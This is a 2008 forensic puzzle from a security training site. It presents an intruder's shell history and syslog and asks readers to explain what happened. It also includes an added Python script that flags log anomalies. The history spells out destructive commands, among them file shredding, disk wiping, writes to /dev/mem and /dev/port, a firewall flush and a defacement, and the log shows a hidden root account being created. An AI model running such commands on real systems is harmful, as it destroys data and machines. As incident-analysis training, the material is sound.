It Happened One Friday

March 21, 2008

Overview: Hello, challenge fans. Matt Carpenter and I have brewed up a new one for your analysis. The evidence is below. Analyze it and answer our questions. As always, we’ll choose three winners: one technical champ, one creative victor whose answer is technically correct, and one lucky person chosen at random.

As you work through this challenge, please observe this very important warning! As they say on TV, DO NOT TRY THIS AT HOME. We’ll go even further by saying, DO NOT TRY IT AT WORK EITHER. The commands included in this challenge are _highly_ destructive, and some of them are hardware specific. They will hose a machine badly. If you insist on testing the commands, at least use a strongly virtualized environment that isolates virtual hardware from physical hardware, and set a snapshot before each command so that you can revert to a pristine state. We wrote the challenge using VMware Workstation, and did not suffer damage to our underlying hosts. However, we cannot guarantee that your VMware experience will match our own. In other words, to borrow from the TV vernacular yet again, YOUR MILEAGE MAY VARY. Furthermore, some so-called "virtualized environments" other than VMware are merely emulators that do not isolate hardware well, nor do they support snapshots. The commands below could damage such environments, so be very careful. You have been warned!

If you can’t answer this challenge 100%, still send something in to qualify as a random winner. This month’s prize is my book, Malware: Fighting Malicious Code, which I authored with Lenny Zeltser. Each winner gets a signed copy.

–Ed Skoudis, Intelguardians
Author, Counter Hack Reloaded




It Happened One Friday

By Matt Carpenter and Ed Skoudis

id
unname -a
uname -a
touch /root/test
ls -la /root
rm /root/test
vi /etc/shadow
iptables -F
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -I OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
rm /var/www/htdocs/index.html
echo "I'm so pwned...." > /var/www/htdocs/index.html
echo JiMxNDk3OyYjMTUxMzsmIzE0OTM7JiMxNTA2OyAmIzE0OTI7JiMxNTA0OyYjMTUxMDsmIzE1MTI7 >> /var/www/htdocs/index.html
echo JiMxNDk3OyAmIzE0OTM7JiMxNTAyOyYjMTUwMDsmIzE0OTg7ICYjMTQ5MjsmIzE0OTc7JiMxNDky >> /var/www/htdocs/index.html
echo OyYjMTQ5MzsmIzE0OTE7JiMxNDk3OyYjMTUwMTs= >> /var/www/htdocs/index.html
wget http://localhost/
chmod 666 /var/www/htdocs/index.html
wget http://localhost/
mail -s "S0 pwned!" `nc -l -p 54742` < /var/www/htdocs/index.html
mke2fs -m 0 /dev/ram9
mke2fs -m 0 /dev/ram8
mke2fs -m 0 /dev/ram7
mkdir -p /mnt/rd
mount /dev/ram9 /mnt/rd
mkdir /mnt/rd/usr
mount /dev/ram8 /mnt/rd/usr
mkdir /mnt/rd/lib
mount /dev/ram7 /mnt/rd/lib
mkdir -p /mnt/rd/var/www/htdocs
mkdir -p /mnt/rd/proc
mkdir -p /mnt/rd/dev
mkdir -p /mnt/rd/tmp
cp -ax /var/www/htdocs/index.html /mnt/rd/var/www/htdocs/
vi /tmp/flist.txt
cat /tmp/flist.txt | while read file; do dir=`echo "$file" |sed 's/\/[^/]*$//'` ; mkdir -p /mnt/rd/$dir ; cp -ax $file /mnt/rd/$dir; done
mount --bind /proc /mnt/rd/proc
mount --bind /dev /mnt/rd/dev
mkdir /mnt/rd/oldroot
cd /mnt/rd
pivot_root . oldroot
exec chroot .
cd
cat /etc/shells
chsh -s /bin/sh
shred -u /oldroot/bin/bash
shred -u /oldroot/etc/shadow
find /oldroot/root -type f -ls -exec shred -u {} \;
find /oldroot/home -type f -ls -exec shred -u {} \;
find /oldroot/usr/[a-km-z]* -type f -ls -exec shred -u {} \;
find /oldroot/usr/lib/[a-hj-z]* -type f -ls -exec shred -u {} \;
find /oldroot/var -type f -ls -exec shred -u {} \;
find /oldroot/etc -type f -ls -exec shred -u {} \;
mount
cat /proc/partitions
dumpe2fs -b /dev/sda2
count=1; while [ $count -lt 1000 ]; do echo $count; count=`expr $count + 1`; done >> /tmp/bad1000
mkdir /tmp
count=1; while [ $count -lt 1000 ]; do echo $count; count=`expr $count + 1`; done >> /tmp/bad1000
e2fsck -l /tmp/bad1000 /dev/sda2
dumpe2fs -b /dev/sda2
echo "dirty" > /tmp/dirty
debugfs --help
man debugfs
which man
fsck you
debugfs -w -f /tmp/dirty /dev/sda2
ll
ls -la
dmidecode |head 50
dd if=/dev/mem bs=1 skip=946272 count=512 |hexdump -C
dd if=/dev/mem bs=1 skip=1048400 count=176 |hexdump -C
dd if=/dev/zero of=/dev/mem seek=983040 count=65535 bs=1
dd if=/dev/zero of=/dev/mem seek=946272 count=102304 bs=1
printf "\x44\x44\x44\x44" |dd of=/dev/port seek=3324 bs=1
printf "\x80" | dd of=/dev/port seek=178 bs=1
shred /dev/sda
logger Dodge This
dd if=/dev/zero of=/dev/mem
Mar 20 05:10:52 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception).
Mar 20 05:41:10 242.229.249.233 syslogd 1.4.1#21ubuntu3: restart.
Mar 20 05:35:00 242.229.249.233 sshd[7564]: Accepted password for owner from 228.229.228.233 port 44156 ssh2
Mar 20 05:35:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for user owner by (uid=0)
Mar 20 05:30:34 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ; USER=root ; COMMAND=/usr/bin/vi /etc/inetd.conf
Mar 20 05:30:54 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ; USER=root ; COMMAND=/etc/init.d/openbsd-inetd stop
Mar 20 05:30:56 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ; USER=root ; COMMAND=/etc/init.d/openbsd-inetd start
Mar 20 05:33:14 242.229.249.233 telnetd[1803]: connect from 228.229.228.233
Mar 20 05:34:24 242.229.249.233 telnetd[6887]: ttloop: retrying
Mar 20 05:34:45 242.229.249.233 su[6913]: Successful su for root by owner
Mar 20 05:34:45 242.229.249.233 su[6913]: + pts/10 owner:root
Mar 20 05:34:45 242.229.249.233 su[6913]: pam_unix(su:session): session opened for user root by owner(uid=1000)
Mar 20 05:35:29 242.229.249.233 telnetd[6887]: child process 6888 exited: 0
Mar 20 05:35:29 242.229.249.233 login[6888]: pam_unix(login:session): session closed for user owner
Mar 20 06:03:14 242.229.249.233 telnetd[1803]: connect from 240.232.249.228
Mar 20 06:04:24 242.229.249.233 telnetd[6887]: ttloop: retrying
Mar 20 06:04:45 242.229.249.233 su[6913]: Successful su for root by owner
Mar 20 06:04:45 242.229.249.233 su[6913]: + pts/10 owner:root
Mar 20 06:04:45 242.229.249.233 su[6913]: pam_unix(su:session): session opened for user root by owner(uid=1000)
Mar 20 06:04:57 242.229.249.233 useradd[6927]: new user: name=luz, UID=0, GID=0, home=/home/luz, shell=/bin/bash
Mar 20 06:05:21 242.229.249.233 passwd[6933]: pam_unix(passwd:chauthtok): password changed for luz
Mar 20 06:05:23 242.229.249.233 su[6913]: pam_unix(su:session): session closed for user root
Mar 20 06:05:29 242.229.249.233 telnetd[6887]: child process 6888 exited: 0
Mar 20 06:05:29 242.229.249.233 login[6888]: pam_unix(login:session): session closed for user owner
Mar 20 06:06:00 242.229.249.233 sshd[7564]: Accepted password for owner from 240.232.249.228 port 44156 ssh2
Mar 20 06:06:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for user luz by (uid=0)
Mar 20 06:27:28 242.229.249.233 postfix/pickup[6046]: 54E38488E8: uid=0 from=<root>
Mar 20 06:27:28 242.229.249.233 postfix/cleanup[6208]: 54E38488E8: message-id=<20080317113539.54E38488E8@humanoid>
Mar 20 06:27:28 242.229.249.233 postfix/qmgr[6047]: 54E38488E8: from=<luz>, size=385, nrcpt=2 (queue active)
Mar 20 06:27:51 242.229.249.233 chsh[11491]: changed user `luz' shell to `/bin/sh'
Mar 20 13:24:16 192.168.255.133 CRON[5703]: Authentication service cannot retrieve authentication info.
Mar 21 05:10:52 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception).
Mar 21 13:02:43 242.229.249.233 luz: Dodge This
Mar 22 05:10:53 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception).
Mar 23 03:31:15 242.229.249.233 syslogd 1.4.1#17ubuntu7: restart.
Mar 23 03:31:16 242.229.249.233 kernel: Inspecting /boot/System.map-2.6.15-27-386
Mar 23 03:31:17 242.229.249.233 kernel: Loaded 23031 symbols from /boot/System.map-2.6.15-27-386.
Mar 23 03:31:17 242.229.249.233 kernel: Symbols match kernel version 2.6.15.
Mar 23 03:31:17 242.229.249.233 kernel: No module symbols loaded - kernel modules not enabled.
Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] Linux version 2.6.15-27-386 (buildd@terranova) (gcc version 4.0.3 (Ubuntu 4.0.3-1ubuntu5)) #1 PREEMPT Sat Sep 16 01:51:59 UTC 2006
Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] BIOS-provided physical RAM map:
Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 0000000000000000 - 000000000009f800 (usable)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000000ca000 - 00000000000cc000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000000dc000 - 0000000000100000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 0000000000100000 - 000000000fef0000 (usable)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000fef0000 - 000000000fefc000 (ACPI data)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000fefc000 - 000000000ff00000 (ACPI NVS)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000ff00000 - 0000000010000000 (usable)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fffe0000 - 0000000100000000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] 0MB HIGHMEM available.
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] 256MB LOWMEM available.
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] found SMP MP-table at 000f6ce0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] On node 0 totalpages: 65536
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMA zone: 4096 pages, LIFO batch:0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMA32 zone: 0 pages, LIFO batch:0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] Normal zone: 61440 pages, LIFO batch:15
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] HighMem zone: 0 pages, LIFO batch:0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMI present.
Mar 23 03:31:20 242.229.249.233 kernel: [17179700.268000] apm: BIOS version 1.2 Flags 0x03 (Driver version 1.16ac)
Mar 23 03:31:20 242.229.249.233 kernel: [17179700.272000] apm: overridden by ACPI.
Mar 23 03:31:29 242.229.249.233 sshd[4030]: Server listening on :: port 22.
Mar 23 03:31:31 242.229.249.233 anacron[4131]: Anacron 2.3 started on 2008-03-23
Mar 23 03:31:33 242.229.249.233 anacron[4131]: Normal exit (0 jobs run)
Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4156]: (CRON) INFO (pidfile fd = 3)
Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4157]: (CRON) STARTUP (fork ok)
Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4157]: (CRON) INFO (Running @reboot jobs)
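A starting point for the log side of the analysis, added here as an example and not part of the challenge evidence or the authors' material: a small Python checker that runs three defender-side sanity checks over a constructed excerpt of the syslog above (timestamps running backwards on one host, a useradd that creates a second UID 0 account, and an ssh login whose PAM session user differs from the user sshd authenticated). The parser assumes plain BSD syslog lines as shown on this page; the regexes and check names are my own.

```python
import re
from datetime import datetime

# Constructed excerpt of the challenge's syslog (host 242.229.249.233), not the full log.
SAMPLE_LOG = """\
Mar 20 05:41:10 242.229.249.233 syslogd 1.4.1#21ubuntu3: restart.
Mar 20 05:35:00 242.229.249.233 sshd[7564]: Accepted password for owner from 228.229.228.233 port 44156 ssh2
Mar 20 05:35:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for user owner by (uid=0)
Mar 20 06:04:57 242.229.249.233 useradd[6927]: new user: name=luz, UID=0, GID=0, home=/home/luz, shell=/bin/bash
Mar 20 06:06:00 242.229.249.233 sshd[7564]: Accepted password for owner from 240.232.249.228 port 44156 ssh2
Mar 20 06:06:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for user luz by (uid=0)
Mar 20 06:27:51 242.229.249.233 chsh[11491]: changed user `luz' shell to `/bin/sh'
"""
# BSD syslog layout: "Mon DD HH:MM:SS host program[pid]: message"
SYSLOG_RE = re.compile(r"^(\w{3} [ \d]\d \d\d:\d\d:\d\d) (\S+) ([^:\[]+?)(?:\[\d+\])?: (.*)$")

def parse(line):
    """Return (timestamp, host, program, message), or None for a non-syslog line."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m.group(1), "%b %d %H:%M:%S"), m.group(2), m.group(3), m.group(4)

def find_anomalies(text):
    """Return (kind, line) findings for the three checks below, in log order."""
    findings, last_ts, pending_login = [], {}, {}
    for line in text.splitlines():
        parsed = parse(line)
        if parsed is None:
            continue
        ts, host, prog, msg = parsed
        # 1. syslog appends in arrival order, so time running backwards on one host
        #    points to a reset clock or to lines injected after the fact.
        if host in last_ts and ts < last_ts[host]:
            findings.append(("clock_backwards", line))
        last_ts[host] = ts
        # 2. Any new account with UID=0 is a second root, whatever it is called.
        if prog == "useradd" and "UID=0," in msg and "name=root," not in msg:
            findings.append(("uid0_account", line))
        # 3. The user sshd authenticated and the user PAM opened a session for should agree.
        m = re.search(r"Accepted \w+ for (\S+) from", msg)
        if prog == "sshd" and m:
            pending_login[host] = m.group(1)
        m = re.search(r"session opened for user (\S+)", msg)
        if prog == "sshd" and m:
            if pending_login.pop(host, None) not in (None, m.group(1)):
                findings.append(("session_user_mismatch", line))
    return findings
```

Run it over the full log above (or a real /var/log/auth.log) to get the same three kinds of finding; the useradd and session checks are cheap enough to run from a cron job.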
  

Question:

1) What happened… and why?

Submit your answers to skillz0308@ethicalhacker.net with the subject line "Skillz Submission" by Sunday April 20, 2008 for a chance to win an autographed copy of my book, Malware: Fighting Malicious Code. The autograph will congratulate you on your prowess in mastering this challenge! We’ll choose three winners, as usual, one in each of the three following categories:

– Best Technical Answer

– Best Creative Answer (that is also technically correct)

– Random Draw (Anyone can win, so send in a response even if you have no faith in your ability to win)

Ed Skoudis
Author, Counter Hack Reloaded
SANS Institute Fellow
Co-founder, Intelguardians

Category: Skillz
